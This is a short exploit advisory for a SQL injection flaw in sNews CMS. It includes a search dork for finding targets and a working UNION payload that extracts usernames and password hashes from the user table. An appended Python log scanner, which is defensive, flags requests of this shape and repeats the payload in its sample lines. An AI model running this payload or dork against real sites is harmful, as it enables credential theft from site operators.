Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keywords: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL PoC:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

Thanks:
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny :*
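
Added example (not part of the original advisory and not sNews code): a log check for the request shape shown in the PoC, flagging `act=shownews` requests whose `id` is not a plain integer and naming the SQL keywords left once `/**/` comments are stripped. It assumes Apache-style access-log lines and that legitimate `id` values are plain integers; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
COMMENT_RE = re.compile(r'/\*.*?\*/|/\*.*$', re.S)  # closed or dangling /* ... */
SQL_RE = re.compile(r'\b(union|select|from|where|concat|char)\b', re.I)

# Constructed access-log lines; the second carries the example URL from this page.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2013:10:00:00 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120',
    '127.0.0.1 - - [01/Jan/2013:10:00:05 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* HTTP/1.1" 200 734',
    '127.0.0.1 - - [01/Jan/2013:10:00:09 +0000] "GET /snews/style.css HTTP/1.1" 200 812',
]

def check_line(line):
    """Return None for a clean line, else (path, reasons)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes values
    if params.get('act') != ['shownews']:
        return None
    reasons = []
    ids = params.get('id', [])
    if len(ids) != 1:
        reasons.append('id missing or repeated')
    for raw in ids:
        # Assumption: a legitimate article id is digits only.
        if not re.fullmatch(r'[0-9]+', raw):
            reasons.append('id is not a plain integer')
        # Treat SQL comments as whitespace, as the database would, then look for keywords.
        flat = re.sub(r'\s+', ' ', COMMENT_RE.sub(' ', raw))
        words = sorted({w.lower() for w in SQL_RE.findall(flat)})
        if words:
            reasons.append('sql keywords: ' + ','.join(words))
    return (url.path, reasons) if reasons else None

def scan(lines):
    """Return (line_number, path, reasons) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = check_line(line)
        if hit:
            hits.append((n,) + hit)
    return hits

if __name__ == '__main__':
    for n, path, reasons in scan(SAMPLE_LOG):
        print(f'line {n}: {path}: ' + '; '.join(reasons))
```

The integer check is the primary signal; the keyword list only adds context for triage.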